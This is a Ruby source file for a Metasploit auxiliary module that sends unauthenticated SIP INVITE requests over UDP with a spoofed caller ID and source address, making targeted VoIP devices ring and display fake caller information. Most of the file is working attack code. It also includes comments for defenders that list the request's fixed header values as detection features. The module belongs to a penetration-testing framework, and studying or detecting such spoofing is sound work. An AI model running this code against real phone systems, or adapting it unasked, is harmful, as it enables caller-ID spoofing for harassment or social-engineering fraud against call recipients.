rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/sip_invite_spoof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
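# Auxiliary scanner module that sends one unauthenticated SIP INVITE over UDP
# to each host, with an operator-chosen display name and source URI in the
# From header.
#
# Defender notes, drawn from the request this file builds:
# - The INVITE is sent straight to the endpoint (RPORT, default 5060) with no
#   authentication, so the From header is unverified. Endpoints that accept
#   INVITEs only from their registered, authenticated proxy would presumably
#   not act on this request; confirm per device.
# - On the wire the request has a Call-ID made of a number in 100..199
#   followed by the destination IP, a fixed "CSeq: 1 INVITE", a fixed
#   "Max-Forwards: 20", a Via header naming the destination IP, and no
#   message body. Those fixed values are usable as detection features.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Scanner

  # Registers module metadata and the datastore options read by #run_host.
  def initialize
    super(
      'Name' => 'SIP Invite Spoof',
      'Description' => %q{
        This module will create a fake SIP invite request making the targeted device ring
        and display fake caller id information.
      },
      'Author' => [
        'David Maynor <dave[at]erratasec.com>', # original module
        'ChrisJohnRiley' # modifications
      ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        # The Description states that the target rings and shows caller-id
        # text, so those effects are declared here instead of an empty list.
        # NOTE(review): the receiving endpoint or proxy may also log the
        # INVITE; consider IOC_IN_LOGS once confirmed.
        'SideEffects' => [AUDIO_EFFECTS, SCREEN_EFFECTS],
        'Reliability' => []
      }
    )

    deregister_udp_options
    register_options(
      [
        Opt::RPORT(5060),
        OptString.new('SRCADDR', [true, 'The sip address the spoofed call is coming from', '192.168.1.1']),
        OptString.new('MSG', [true, 'The spoofed caller id to send', 'The Metasploit has you']),
        OptString.new('EXTENSION', [false, 'The specific extension or name to target', nil]),
        OptString.new('DOMAIN', [false, 'Use a specific SIP domain', nil])
      ]
    )
    register_advanced_options(
      [
        OptAddress.new('SIP_PROXY_NAME', [false, 'Use a specific SIP proxy', nil]),
        OptPort.new('SIP_PROXY_PORT', [false, 'SIP Proxy port to use', 5060])
      ]
    )
  end

  # Builds the INVITE for one host and sends it as a single UDP datagram.
  # No response is read; the method only transmits.
  #
  # @param ip [String] address of the host being processed by the scanner mixin
  # @return [void]
  def run_host(ip)
    name = datastore['MSG']
    src = datastore['SRCADDR']
    ext = datastore['EXTENSION']
    dom = datastore['DOMAIN']
    sphost = datastore['SIP_PROXY_NAME']
    spport = datastore['SIP_PROXY_PORT'] || 5060

    # Request target: optional "<extension>@" followed by DOMAIN, or by the
    # host address when DOMAIN is unset or empty.
    conn_string = ''
    conn_string = "#{ext}@" unless ext.nil? || ext.empty?
    conn_string << (dom.nil? || dom.empty? ? ip.to_s : dom.to_s)

    # A Route header is emitted only when SIP_PROXY_NAME is set.
    route = nil
    route = "Route: <sip:#{sphost}:#{spport};lr>\r\n" unless sphost.nil? || sphost.empty?

    connect_udp

    print_status("Sending Fake SIP Invite to: #{conn_string}")
    print_status("Using SIP proxy #{sphost}:#{spport}") if route

    # Option values are interpolated into the headers exactly as supplied.
    req = "INVITE sip:#{conn_string} SIP/2.0\r\n"
    req << route if route
    req << "To: <sip:#{conn_string}>\r\n"
    req << "Via: SIP/2.0/UDP #{ip}\r\n"
    req << "From: \"#{name}\"<sip:#{src}>\r\n"
    req << "Call-ID: #{rand(100..199)}#{ip}\r\n"
    req << "CSeq: 1 INVITE\r\n"
    req << "Max-Forwards: 20\r\n"
    req << "Contact: <sip:#{conn_string}>\r\n\r\n"

    udp_sock.put(req)
  rescue Errno::EACCES => e
    vprint_error(e.message)
  ensure
    # Release the socket on every path. Previously disconnect_udp ran only
    # after a successful send, so any exception left the socket open.
    # NOTE(review): assumes disconnect_udp tolerates a socket that was never
    # opened (connect_udp itself failing) - confirm against the Udp mixin.
    disconnect_udp
  end
end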